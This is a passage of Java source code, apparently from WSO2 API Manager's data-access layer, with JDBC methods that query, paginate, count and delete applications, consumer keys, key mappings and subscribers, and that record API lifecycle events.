SQLConstantManagerFactory.getSQlString("GET_APPLICATIONS_PREFIX_NONE_CASESENSITVE"); } } try { connection = APIMgtDBUtil.getConnection(); // sortColumn, sortOrder variable values has sanitized in jaggery level (applications-list.jag)for security. sqlQuery = sqlQuery.replace("$1", sortColumn); sqlQuery = sqlQuery.replace("$2", sortOrder); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] grpIdArray = groupingId.split(","); int noOfParams = grpIdArray.length; prepStmt = fillQueryParams(connection, sqlQuery, grpIdArray, 1); prepStmt.setString(++noOfParams, tenantDomain); prepStmt.setString(++noOfParams, subscriber.getName()); prepStmt.setString(++noOfParams, tenantDomain + '/' + groupingId); prepStmt.setString(++noOfParams, "%" + search + "%"); prepStmt.setInt(++noOfParams, start); prepStmt.setInt(++noOfParams, offset); } else { prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, groupingId); prepStmt.setString(2, subscriber.getName()); prepStmt.setString(3, "%" + search + "%"); prepStmt.setInt(4, start); prepStmt.setInt(5, offset); } } else { prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, subscriber.getName()); prepStmt.setString(2, "%" + search + "%"); prepStmt.setInt(3, start); prepStmt.setInt(4, offset); } rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(rs.getString("NAME"), subscriber); application.setId(rs.getInt("APPLICATION_ID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setIsBlackListed(rs.getBoolean("ENABLED")); application.setOwner(rs.getString("CREATED_BY")); if (multiGroupAppSharingEnabled) { setGroupIdInApplication(application); } applicationsList.add(application); } applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from" + 
" the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } /** * Returns all the applications associated with given subscriber and group id. * * @param subscriber The subscriber. * @param groupingId The groupId to which the applications must belong. * @return Application[] Array of applications. * @throws APIManagementException */ public Application[] getApplications(Subscriber subscriber, String groupingId) throws APIManagementException { Application[] applications = getLightWeightApplications(subscriber, groupingId); for (Application application : applications) { Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } } return applications; } /** * Returns all the applications associated with given subscriber and group id, without their keys. * * @param subscriber The subscriber. * @param groupingId The groupId to which the applications must belong. * @return Application[] Array of applications. * @throws APIManagementException */ public Application[] getLightWeightApplications(Subscriber subscriber, String groupingId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application[] applications = null; String sqlQuery = SQLConstants.GET_APPLICATIONS_PREFIX; String whereClauseWithGroupId; String whereClauseWithMultiGroupId; if (forceCaseInsensitiveComparisons) { if (multiGroupAppSharingEnabled) { whereClauseWithGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR (LOWER(SUB.USER_ID) = LOWER(?))" + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?)))"; } else { whereClauseWithGroupId = " AND " + " (GROUP_ID= ? " + " OR " + " ((GROUP_ID='' OR GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?))) "; } } else { if (multiGroupAppSharingEnabled) { whereClauseWithGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR ( SUB.USER_ID = ? )" + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) "; } else { whereClauseWithGroupId = " AND " + " (GROUP_ID= ? 
" + " OR " + " ((GROUP_ID='' OR GROUP_ID IS NULL) AND SUB.USER_ID=?))"; } } String whereClause; if (forceCaseInsensitiveComparisons) { whereClause = " AND " + " LOWER(SUB.USER_ID) = LOWER(?)"; } else { whereClause = " AND " + " SUB.USER_ID = ?"; } if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { sqlQuery += whereClauseWithGroupId; } else { sqlQuery += whereClause; } try { connection = APIMgtDBUtil.getConnection(); String blockingFilerSql = null; if (connection.getMetaData().getDriverName().contains("MS SQL") || connection.getMetaData().getDriverName().contains("Microsoft")) { sqlQuery = sqlQuery.replaceAll("NAME", "cast(NAME as varchar(100)) collate " + "SQL_Latin1_General_CP1_CI_AS as NAME"); blockingFilerSql = " select distinct x.*,bl.ENABLED from ( " + sqlQuery + " )x left join " + "AM_BLOCK_CONDITIONS bl on ( bl.TYPE = 'APPLICATION' AND bl.VALUE = (x.USER_ID + ':') + x" + ".name)"; } else { blockingFilerSql = " select distinct x.*,bl.ENABLED from ( " + sqlQuery + " )x left join AM_BLOCK_CONDITIONS bl on ( bl.TYPE = 'APPLICATION' AND bl.VALUE = " + "concat(concat(x.USER_ID,':'),x.name))"; } if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIDArray[] = groupingId.split(","); int paramIndex = groupIDArray.length; prepStmt = fillQueryParams(connection, blockingFilerSql, groupIDArray, 1); prepStmt.setString(++paramIndex, tenantDomain); prepStmt.setString(++paramIndex, subscriber.getName()); prepStmt.setString(++paramIndex, tenantDomain + '/' + groupingId); } else { prepStmt = connection.prepareStatement(blockingFilerSql); prepStmt.setString(1, groupingId); prepStmt.setString(2, subscriber.getName()); } } else { prepStmt = connection.prepareStatement(blockingFilerSql); prepStmt.setString(1, subscriber.getName()); } rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; Map<String,String> applicationAttributes; int applicationId = 0; while (rs.next()) { applicationId = rs.getInt("APPLICATION_ID"); application = new Application(rs.getString("NAME"), subscriber); application.setId(applicationId); application.setTier(rs.getString("APPLICATION_TIER")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setIsBlackListed(rs.getBoolean("ENABLED")); application.setOwner(rs.getString("CREATED_BY")); application.setTokenType(rs.getString("TOKEN_TYPE")); applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); if (multiGroupAppSharingEnabled) { setGroupIdInApplication(application); } applicationsList.add(application); } Collections.sort(applicationsList, new Comparator<Application>() { public int compare(Application o1, Application o2) { return o1.getName().compareToIgnoreCase(o2.getName()); } }); applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } /** * Returns applications within a tenant 
domain with pagination * @param tenantId The tenantId. * @param start The start index. * @param offset The offset. * @param searchOwner The search string. * @param searchApplication The search string. * @param sortOrder The sort order. * @param sortColumn The sort column. * @return Application[] The array of applications. * @throws APIManagementException */ public List<Application> getApplicationsByTenantIdWithPagination(int tenantId, int start, int offset, String searchOwner, String searchApplication, String sortColumn, String sortOrder) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application applications = null; String sqlQuery = null; List<Application> applicationList = new ArrayList<>(); sqlQuery = SQLConstantManagerFactory.getSQlString("GET_APPLICATIONS_BY_TENANT_ID"); try { connection = APIMgtDBUtil.getConnection(); sqlQuery = sqlQuery.replace("$1", sortColumn); sqlQuery = sqlQuery.replace("$2", sortOrder); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, tenantId); prepStmt.setString(2, "%" + searchOwner + "%"); prepStmt.setString(3, "%" + searchApplication + "%"); prepStmt.setInt(4, start); prepStmt.setInt(5, offset); rs = prepStmt.executeQuery(); Application application; while (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberName = rs.getString("CREATED_BY"); Subscriber subscriber = new Subscriber(subscriberName); application = new Application(applicationName, subscriber); application.setName(applicationName); application.setId(rs.getInt("APPLICATION_ID")); application.setUUID(rs.getString("UUID")); application.setGroupId(rs.getString("GROUP_ID")); subscriber.setTenantId(rs.getInt("TENANT_ID")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); application.setOwner(subscriberName); applicationList.add(application); } } catch (SQLException e) { handleException("Error while obtaining details of the Application for tenant id : " + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applicationList; } public int getApplicationsCount(int tenantId, String searchOwner, String searchApplication) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String sqlQuery = null; try { connection = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_APPLICATIONS_COUNT; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, tenantId); prepStmt.setString(2, "%" + searchOwner + "%"); prepStmt.setString(3, "%" + searchApplication + "%"); resultSet = prepStmt.executeQuery(); int applicationCount = 0; if (resultSet != null) { while (resultSet.next()) { applicationCount = resultSet.getInt("count"); } } if (applicationCount > 0) { return applicationCount; } } catch (SQLException e) { handleException("Failed to get application count of tenant id : " + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return 0; } public Application[] getAllApplicationsOfTenantForMigration(String appTenantDomain) throws APIManagementException { Connection connection; PreparedStatement prepStmt = null; ResultSet rs; Application[] applications = null; String sqlQuery = SQLConstants.GET_SIMPLE_APPLICATIONS; String tenantFilter = "AND SUB.TENANT_ID=?"; sqlQuery += tenantFilter ; try { connection = APIMgtDBUtil.getConnection(); int appTenantId = APIUtil.getTenantIdFromTenantDomain(appTenantDomain); prepStmt = 
connection.prepareStatement(sqlQuery); prepStmt.setInt(1, appTenantId); rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(Integer.parseInt(rs.getString("APPLICATION_ID"))); application.setName(rs.getString("NAME")); application.setOwner(rs.getString("CREATED_BY")); applicationsList.add(application); } applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from the persistence store.", e); } finally { if (prepStmt != null) { try { prepStmt.close(); } catch (SQLException e) { log.warn("Database error. Could not close Statement. Continuing with others." + e.getMessage(), e); } } } return applications; } /** * Returns all the consumerkeys of application which are subscribed for the given api * * @param identifier APIIdentifier * @return Consumerkeys * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get Applications for given subscriber. */ public String[] getConsumerKeys(APIIdentifier identifier) throws APIManagementException { Set<String> consumerKeys = new HashSet<String>(); Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int apiId; String sqlQuery = SQLConstants.GET_CONSUMER_KEYS_SQL; try { connection = APIMgtDBUtil.getConnection(); apiId = getAPIID(identifier, connection); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, apiId); rs = prepStmt.executeQuery(); while (rs.next()) { consumerKeys.add(rs.getString("CONSUMER_KEY")); } } catch (SQLException e) { handleException("Error when reading application subscription information", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKeys.toArray(new String[consumerKeys.size()]); } /** * Deletes an Application along with subscriptions, keys and registration data * * @param application Application object to be deleted from the database which has the application Id * @throws APIManagementException */ public void deleteApplication(Application application) throws APIManagementException { Connection connection = null; PreparedStatement deleteMappingQuery = null; PreparedStatement prepStmt = null; PreparedStatement prepStmtGetConsumerKey = null; PreparedStatement deleteRegistrationQuery = null; PreparedStatement deleteSubscription = null; PreparedStatement deleteDomainApp = null; PreparedStatement deleteAppKey = null; PreparedStatement deleteApp = null; ResultSet rs = null; String getSubscriptionsQuery = SQLConstants.GET_SUBSCRIPTION_ID_OF_APPLICATION_SQL; String getConsumerKeyQuery = SQLConstants.GET_CONSUMER_KEY_OF_APPLICATION_SQL; String deleteKeyMappingQuery = SQLConstants.REMOVE_APPLICATION_FROM_SUBSCRIPTION_KEY_MAPPINGS_SQL; String deleteSubscriptionsQuery = SQLConstants.REMOVE_APPLICATION_FROM_SUBSCRIPTIONS_SQL; String deleteApplicationKeyQuery = SQLConstants.REMOVE_APPLICATION_FROM_APPLICATION_KEY_MAPPINGS_SQL; String deleteDomainAppQuery = SQLConstants.REMOVE_APPLICATION_FROM_DOMAIN_MAPPINGS_SQL; String deleteApplicationQuery = SQLConstants.REMOVE_APPLICATION_FROM_APPLICATIONS_SQL; String deleteRegistrationEntry = SQLConstants.REMOVE_APPLICATION_FROM_APPLICATION_REGISTRATIONS_SQL; boolean transactionCompleted = true; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(getSubscriptionsQuery); prepStmt.setInt(1, 
application.getId()); rs = prepStmt.executeQuery(); if (multiGroupAppSharingEnabled) { transactionCompleted = updateGroupIDMappings(connection, application.getId(), null, null); } List<Integer> subscriptions = new ArrayList<Integer>(); while (rs.next()) { subscriptions.add(rs.getInt("SUBSCRIPTION_ID")); } deleteMappingQuery = connection.prepareStatement(deleteKeyMappingQuery); for (Integer subscriptionId : subscriptions) { deleteMappingQuery.setInt(1, subscriptionId); deleteMappingQuery.addBatch(); } deleteMappingQuery.executeBatch(); if (log.isDebugEnabled()) { log.debug("Subscription Key mapping details are deleted successfully for Application - " + application.getName()); } deleteRegistrationQuery = connection.prepareStatement(deleteRegistrationEntry); deleteRegistrationQuery.setInt(1, application.getId()); deleteRegistrationQuery.execute(); if (log.isDebugEnabled()) { log.debug("Application Registration details are deleted successfully for Application - " + application.getName()); } deleteSubscription = connection.prepareStatement(deleteSubscriptionsQuery); deleteSubscription.setInt(1, application.getId()); deleteSubscription.execute(); if (log.isDebugEnabled()) { log.debug("Subscription details are deleted successfully for Application - " + application.getName()); } prepStmtGetConsumerKey = connection.prepareStatement(getConsumerKeyQuery); prepStmtGetConsumerKey.setInt(1, application.getId()); rs = prepStmtGetConsumerKey.executeQuery(); ArrayList<String> consumerKeys = new ArrayList<String>(); deleteDomainApp = connection.prepareStatement(deleteDomainAppQuery); while (rs.next()) { String consumerKey = rs.getString("CONSUMER_KEY"); // This is true when OAuth app has been created by pasting consumer key/secret in the screen. String mode = rs.getString("CREATE_MODE"); if (consumerKey != null) { deleteDomainApp.setString(1, consumerKey); deleteDomainApp.addBatch(); KeyManagerHolder.getKeyManagerInstance().deleteMappedApplication(consumerKey); // OAuth app is deleted if only it has been created from API Store. For mapped clients we don't // call delete. if (!"MAPPED".equals(mode)) { // Adding clients to be deleted. consumerKeys.add(consumerKey); } } } deleteDomainApp.executeBatch(); deleteAppKey = connection.prepareStatement(deleteApplicationKeyQuery); deleteAppKey.setInt(1, application.getId()); deleteAppKey.execute(); if (log.isDebugEnabled()) { log.debug("Application Key Mapping details are deleted successfully for Application - " + application .getName()); } deleteApp = connection.prepareStatement(deleteApplicationQuery); deleteApp.setInt(1, application.getId()); deleteApp.execute(); if (log.isDebugEnabled()) { log.debug("Application " + application.getName() + " is deleted successfully."); } if (transactionCompleted) { connection.commit(); } for (String consumerKey : consumerKeys) { //delete on oAuthorization server. 
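                // Only consumer keys collected above are removed from the authorization server here,
                // i.e. OAuth apps created from the API Store; clients registered in "MAPPED" mode were
                // deliberately excluded from this list.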
KeyManagerHolder.getKeyManagerInstance().deleteApplication(consumerKey); } } catch (SQLException e) { handleException("Error while removing application details from the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtGetConsumerKey, connection, rs); APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); APIMgtDBUtil.closeAllConnections(deleteApp, null, null); APIMgtDBUtil.closeAllConnections(deleteAppKey, null, null); APIMgtDBUtil.closeAllConnections(deleteMappingQuery, null, null); APIMgtDBUtil.closeAllConnections(deleteRegistrationQuery, null, null); APIMgtDBUtil.closeAllConnections(deleteSubscription, null, null); APIMgtDBUtil.closeAllConnections(deleteDomainApp, null, null); APIMgtDBUtil.closeAllConnections(deleteAppKey, null, null); APIMgtDBUtil.closeAllConnections(deleteApp, null, null); } } public APIKey[] getConsumerKeysWithMode(int appId, String mode) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; ArrayList<APIKey> consumerKeys = new ArrayList<APIKey>(); String getConsumerKeyQuery = SQLConstants.GET_CONSUMER_KEY_WITH_MODE_SLQ; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(getConsumerKeyQuery); prepStmt.setInt(1, appId); prepStmt.setString(2, mode); rs = prepStmt.executeQuery(); while (rs.next()) { String consumerKey = rs.getString("CONSUMER_KEY"); if (consumerKey != null && !consumerKey.isEmpty()) { APIKey apiKey = new APIKey(); apiKey.setConsumerKey(consumerKey); apiKey.setType(rs.getString("KEY_TYPE")); consumerKeys.add(apiKey); } } } catch (SQLException e) { String msg = "Error occurred while getting consumer keys"; log.error(msg, e); throw new APIManagementException(msg, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKeys.toArray(new APIKey[consumerKeys.size()]); } /** * Returns the consumer Key for a given Application Name, Subscriber Name, Key Type, Grouping Id combination. * * @param applicationName Name of the Application. * @param subscriberId Name of Subscriber. * @param keyType PRODUCTION | SANDBOX. * @param groupingId Grouping ID. When set to null query will be performed using the other three values. * @return Consumer Key matching the provided combination. * @throws APIManagementException */ public String getConsumerKeyForApplicationKeyType(String applicationName, String subscriberId, String keyType, String groupingId) throws APIManagementException { String consumerKey = null; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_CONSUMER_KEY_FOR_APPLICATION_KEY_TYPE_SQL; String whereSubscriberUserID = "SUB.USER_ID = ?"; if (forceCaseInsensitiveComparisons) { whereSubscriberUserID = "lower(SUB.USER_ID) = ?"; subscriberId = subscriberId.toLowerCase(); } String whereClauseWithGroupId = " AND " + "(APP.GROUP_ID= ? 
OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND " + whereSubscriberUserID + "))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR " + whereSubscriberUserID + ")"; String whereClause = " AND " + whereSubscriberUserID; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(subscriberId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIDArray[] = groupingId.split(","); sqlQuery += whereClauseWithMultiGroupId; prepStmt = fillQueryParams(connection, sqlQuery, groupIDArray, 3); prepStmt.setString(1, applicationName); prepStmt.setString(2, keyType); int paramIndex = groupIDArray.length + 2; prepStmt.setString(++paramIndex, tenantDomain); prepStmt.setString(++paramIndex, subscriberId); } else { sqlQuery += whereClauseWithGroupId; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, applicationName); prepStmt.setString(2, keyType); prepStmt.setString(3, groupingId); prepStmt.setString(4, subscriberId); } } else { sqlQuery += whereClause; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, applicationName); prepStmt.setString(2, keyType); prepStmt.setString(3, subscriberId); } rs = prepStmt.executeQuery(); while (rs.next()) { consumerKey = rs.getString("CONSUMER_KEY"); } } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKey; } /** * Returns the consumer Key for a given Application Name, Subscriber Name, Key Type, Grouping Id combination. * * @param applicationId Id of the Application. * @param subscriberId Name of Subscriber. * @param keyType PRODUCTION | SANDBOX. * @param groupingId Grouping ID. When set to null query will be performed using the other three values. * @return Consumer Key matching the provided combination. * @throws APIManagementException */ public String getConsumerKeyForApplicationKeyType(int applicationId, String subscriberId, String keyType, String groupingId) throws APIManagementException { String consumerKey = null; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_CONSUMER_KEY_FOR_APPLICATION_KEY_TYPE_BY_APP_ID_SQL; String whereSubscriberUserID = "SUB.USER_ID = ?"; if (forceCaseInsensitiveComparisons) { whereSubscriberUserID = "lower(SUB.USER_ID) = ?"; subscriberId = subscriberId.toLowerCase(); } String whereClauseWithGroupId = " AND " + "(APP.GROUP_ID= ? 
OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND " + whereSubscriberUserID + "))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR " + whereSubscriberUserID + ")"; String whereClause = " AND " + whereSubscriberUserID; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(subscriberId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIDArray[] = groupingId.split(","); sqlQuery += whereClauseWithMultiGroupId; prepStmt = fillQueryParams(connection, sqlQuery, groupIDArray, 3); prepStmt.setInt(1, applicationId); prepStmt.setString(2, keyType); int paramIndex = groupIDArray.length + 2; prepStmt.setString(++paramIndex, tenantDomain); prepStmt.setString(++paramIndex, subscriberId); } else { sqlQuery += whereClauseWithGroupId; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, applicationId); prepStmt.setString(2, keyType); prepStmt.setString(3, groupingId); prepStmt.setString(4, subscriberId); } } else { sqlQuery += whereClause; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, applicationId); prepStmt.setString(2, keyType); prepStmt.setString(3, subscriberId); } rs = prepStmt.executeQuery(); while (rs.next()) { consumerKey = rs.getString("CONSUMER_KEY"); } } catch (SQLException e) { handleException("Error when reading the application information from the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKey; } /** * This method will return a java Map that contains application ID and token type. * * @param consumerKey consumer key of the oAuth application. * @return Map. 
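 *         The returned map uses the keys {@code application_id} and {@code token_type},
 *         populated from the APPLICATION_ID and KEY_TYPE columns respectively.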
* @throws APIManagementException */ public Map<String, String> getApplicationIdAndTokenTypeByConsumerKey(String consumerKey) throws APIManagementException { Map<String, String> appIdAndConsumerKey = new HashMap<String, String>(); if (log.isDebugEnabled()) { log.debug("fetching application id and token type by consumer key " + consumerKey); } Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_APPLICATION_ID_BY_CONSUMER_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, consumerKey); rs = prepStmt.executeQuery(); while (rs.next()) { appIdAndConsumerKey.put("application_id", rs.getString("APPLICATION_ID")); appIdAndConsumerKey.put("token_type", rs.getString("KEY_TYPE")); } } catch (SQLException e) { handleException("Error when reading application subscription information", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return appIdAndConsumerKey; } /* Delete mapping record by given consumer key */ public void deleteApplicationKeyMappingByConsumerKey(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); String deleteKeyMappingQuery = SQLConstants.DELETE_APPLICATION_KEY_MAPPING_BY_CONSUMER_KEY_SQL; if (log.isDebugEnabled()) { log.debug("trying to delete key mapping for consumer id " + consumerKey); } ps = connection.prepareStatement(deleteKeyMappingQuery); ps.setString(1, consumerKey); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error while removing application mapping table", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } /** * This method will delete a record from AM_APPLICATION_REGISTRATION * * @param applicationId * @param tokenType */ public void deleteApplicationKeyMappingByApplicationIdAndType(String applicationId, String tokenType) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); String deleteRegistrationEntry = SQLConstants.DELETE_APPLICATION_KEY_MAPPING_BY_APPLICATION_ID_SQL; if (log.isDebugEnabled()) { log.debug("trying to delete a record from AM_APPLICATION_KEY_MAPPING table by application ID " + applicationId + " and Token type" + tokenType); } ps = connection.prepareStatement(deleteRegistrationEntry); ps.setInt(1, Integer.parseInt(applicationId)); ps.setString(2, tokenType); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error while removing AM_APPLICATION_KEY_MAPPING table", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } /** * Delete a record from AM_APPLICATION_REGISTRATION table by application ID and token type. * * @param applicationId APIM application ID. * @param tokenType Token type (PRODUCTION || SANDBOX) * @throws APIManagementException if failed to delete the record. 
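 * <p>
 * Illustrative call (editorial sketch; the application id value is a placeholder):
 * <pre>{@code
 * // Removes the PRODUCTION key registration entry of application "5".
 * dao.deleteApplicationRegistration("5", "PRODUCTION");
 * }</pre>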
*/ public void deleteApplicationRegistration(String applicationId, String tokenType) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); String deleteRegistrationEntry = SQLConstants.REMOVE_FROM_APPLICATION_REGISTRANTS_SQL; if (log.isDebugEnabled()) { log.debug("trying to delete a record from AM_APPLICATION_REGISTRATION table by application ID " + applicationId + " and Token type" + tokenType); } ps = connection.prepareStatement(deleteRegistrationEntry); ps.setInt(1, Integer.parseInt(applicationId)); ps.setString(2, tokenType); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error while removing AM_APPLICATION_REGISTRATION table", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } /** * returns a subscriber record for given username,tenant Id * * @param username UserName * @param tenantId Tenant Id * @param connection * @return Subscriber * @throws APIManagementException if failed to get subscriber */ private Subscriber getSubscriber(String username, int tenantId, Connection connection) throws APIManagementException { PreparedStatement prepStmt = null; ResultSet rs = null; Subscriber subscriber = null; String sqlQuery; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIBER_CASE_INSENSITIVE_SQL; } else { sqlQuery = SQLConstants.GET_SUBSCRIBER_DETAILS_SQL; } try { prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, username); prepStmt.setInt(2, tenantId); rs = prepStmt.executeQuery(); if (rs.next()) { subscriber = new Subscriber(rs.getString("USER_ID")); subscriber.setEmail(rs.getString("EMAIL_ADDRESS")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); subscriber.setSubscribedDate(rs.getDate("DATE_SUBSCRIBED")); subscriber.setTenantId(rs.getInt("TENANT_ID")); return subscriber; } } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); } return subscriber; } public void recordAPILifeCycleEvent(APIIdentifier identifier, APIStatus oldStatus, APIStatus newStatus, String userId, int tenantId) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); recordAPILifeCycleEvent(identifier, oldStatus.toString(), newStatus.toString(), userId, tenantId, conn); } catch (SQLException e) { handleException("Failed to record API state change", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } public void recordAPILifeCycleEvent(APIIdentifier identifier, String oldStatus, String newStatus, String userId, int tenantId) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); recordAPILifeCycleEvent(identifier, oldStatus, newStatus, userId, tenantId, conn); } catch (SQLException e) { handleException("Failed to record API state change", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } public void recordAPILifeCycleEvent(APIIdentifier identifier, String oldStatus, String newStatus, String userId, int tenantId, Connection conn) throws APIManagementException { //Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement selectQuerySt = null; int apiId = -1; if (oldStatus == null && !newStatus.equals(APIConstants.CREATED)) { String msg = "Invalid old and new state combination"; log.error(msg); 
throw new APIManagementException(msg); } else if (oldStatus != null && oldStatus.equals(newStatus)) { String msg = "No measurable differences in API state"; log.error(msg); throw new APIManagementException(msg); } String getAPIQuery = SQLConstants.GET_API_ID_SQL; String sqlQuery = SQLConstants.ADD_API_LIFECYCLE_EVENT_SQL; try { conn.setAutoCommit(false); selectQuerySt = conn.prepareStatement(getAPIQuery); selectQuerySt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); selectQuerySt.setString(2, identifier.getApiName()); selectQuerySt.setString(3, identifier.getVersion()); resultSet = selectQuerySt.executeQuery(); if (resultSet.next()) { apiId = resultSet.getInt("API_ID"); } if (apiId == -1) { String msg = "Unable to find the API: " + identifier + " in the database"; log.error(msg); throw new APIManagementException(msg); } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); if (oldStatus != null) { ps.setString(2, oldStatus); } else { ps.setNull(2, Types.VARCHAR); } ps.setString(3, newStatus); ps.setString(4, userId); ps.setInt(5, tenantId); ps.setTimestamp(6, new Timestamp(System.currentTimeMillis())); 